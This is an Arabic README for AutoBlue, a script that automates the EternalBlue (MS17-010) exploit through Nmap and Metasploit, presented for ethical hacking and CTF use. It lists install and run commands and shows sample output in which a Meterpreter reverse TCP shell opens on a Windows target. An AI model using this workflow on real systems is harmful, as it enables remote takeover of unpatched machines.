
AutoBlue - أداة استغلال آلية لـ EternalBlue (CVE-2017-0144 / MS17-010) تستخدم Nmap و Metasploit لأغراض الاختراق الأخلاقي، واختبار الاختراق، وتحديات CTF. فقط للاستخدام المصرح به والتعليمي!
AUTOBLUE هي أداة أتمتة مصممة لاستغلال ثغرة EternalBlue (CVE-2017-0144) على أجهزة ويندوز. تدمج الأداة قوة Nmap لفحص الثغرات و msfconsole من Metasploit للاستغلال، مما يمكّن المستخدمين من تحديد الأنظمة الضعيفة آلياً وإطلاق استغلال EternalBlue للحصول على وصول عن بُعد إلى الهدف.
صُممت هذه الأداة بشكل أساسي لمحترفي الأمن، ومختبرَي الاختراق، والمخترقين الأخلاقيين الذين يعملون في بيئات خاضعة للرقابة ومصرح بها مثل تحديات التقاط العلم (CTF)، ومهام اختبار الاختراق، أو الإعدادات المختبرية. يسمح AUTOBLUE للمستخدمين باستغلال ثغرة EternalBlue بأقل تدخل يدوي بمجرد إدخال عنوان IP للهدف.
الميزات
جدول المحتويات
المتطلبات الأساسية:
قبل استخدام AUTOBLUE، تأكد من تثبيت الأدوات التالية على جهازك:
Nmap: أداة فحص الشبكات لاكتشاف الأجهزة الضعيفة. Metasploit Framework: منصة اختبار اختراق تتضمن استغلالات لـ EternalBlue.
تثبيت Nmap:
انسخ الكود
sudo apt update
و
sudo apt install nmap
على ويندوز أو ماك، قم بتحميل Nmap من الموقع الرسمي.
تثبيت Metasploit:
على لينكس (قائم على Debian):
انسخ الكود
sudo apt update
و
sudo apt install metasploit-framework
على ويندوز أو ماك، قم بتحميل Metasploit من الموقع الرسمي.
التثبيت:
لتثبيت AUTOBLUE، اتبع الخطوات التالية:
استنساخ المستودع:
git clone https://github.com/AtithKhawas/autoblue.git
و
cd autoblue
تأكد من تثبيت Nmap و Metasploit بشكل صحيح كمتطلبات أساسية.
جعل النص البرمجي قابلاً للتنفيذ:
chmod +x autoblue.sh
الاستخدام:
AUTOBLUE مصمم لأتمتة فحص واستغلال ثغرة EternalBlue. إليك كيفية استخدامه:
لاستخدام AUTOBLUE، قم بتشغيل الأمر التالي في الطرفية:
انسخ الكود
./autoblue.sh
المخرجات:
┌──(root㉿kali)-[/home/Elliot]
└─# ./autoblue.sh
============================================
********************************************
AutoBlue - أتمتة استغلال EternalBlue
********************************************
********************************************
------------------------من إعداد ATITH KHAWAS
============================================
أدخل عنوان IP للهدف:
سيطلب عنوان IP للهدف وعنوان IP الخاص بك.
مثال
أدخل عنوان IP للهدف: <عنوان IP للهدف>
أدخل عنوان IP الخاص بك: <عنوان IP الخاص بك>
بمجرد تشغيل الأداة، ستبدأ المسح باستخدام Nmap:
المخرجات-1
عنوان IP للهدف: ***.***.**.**
[+] جاري فحص الهدف بحثاً عن ثغرة MS17-010...
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-12-30 12:41 EST
Nmap scan report for ***.***.**.**
المضيف نشط (تأخير 0.19 ثانية).
PORT STATE SERVICE
445/tcp open microsoft-ds
نتائج نصوص المضيف:
| smb-vuln-ms17-010:
| VULNERABLE:
| ثغرة تنفيذ كود عن بُعد في خوادم Microsoft SMBv1 (ms17-010)
| الحالة: VULNERABLE
| المعرفات: CVE:CVE-2017-0143
| درجة الخطورة: HIGH
| توجد ثغرة حرجة لتنفيذ كود عن بُعد في خوادم Microsoft SMBv1
| (ms17-010).
|
| تاريخ الإفصاح: 2017-03-14
| المراجع:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_ https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
Nmap done: 1 عنوان IP (مضيف واحد نشط) تم مسحه في 2.40 ثانية
[+] الهدف VULNERABLE (ضعيف) تجاه EternalBlue!
هنا يبدأ العمل الحقيقي، مما يقلل بشكل كبير من العملية المستهلكة للوقت. إذا كان الهدف ضعيفاً، فإنه يطلق تلقائياً Msfconsole ويضبط RHOSTS و PAYLOAD و LHOST و LPORT مع المنفذ الافتراضي 4444.
المخرجات-2
[+] جاري تشغيل Metasploit...
[*] لم يتم تكوين حمولة، سيتم استخدام الحمولة الافتراضية windows/x64/meterpreter/reverse_tcp
RHOSTS => ***.***.**.**
PAYLOAD => windows/x64/meterpreter/reverse_tcp
LHOST => ***.***.**.**
LPORT => 4444
[*] بدأ معالج TCP العكسي على ***.***.**.**:4444
وتعطينا واجهة مترجم Meterpreter للهدف.
المخرجات-3
[+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-WIN-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
[+] ***.***.**.**:445 - =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=
meterpreter > pwd
C:\Windows\system32
كيف يعمل:
اعتبارات أمنية:
المساهمة:
المساهمات في مشروع AUTOBLUE مرحب بها. إذا كان لديك أي اقتراحات أو تحسينات أو إصلاحات للأخطاء، لا تتردد في عمل fork للمستودع وإنشاء طلب سحب.
الترخيص:
هذه الأداة مفتوحة المصدر وموزعة بموجب ترخيص MIT. أنت حر في استخدام وتعديل وتوزيع البرنامج في مشاريعك الخاصة. ومع ذلك، يجب عليك تضمين هذا الإشعار في جميع النسخ أو الأجزاء الجوهرية من البرنامج.
الشكر والتقدير:
إخلاء المسؤولية:
AUTOBLUE هي أداة مخصصة للاستخدام التعليمي والأخلاقي فقط. المؤلفون غير مسؤولين عن أي إجراءات غير قانونية تتخذ باستخدام هذه الأداة. من مسؤوليتك التأكد من أن لديك إذناً صريحاً لإجراء اختبارات الاختراق على أي نظام.
استخدم هذه الأداة على مسؤوليتك الخاصة. قم دائماً بتنفيذ أنشطة اختبار الاختراق في بيئة آمنة وقانونية.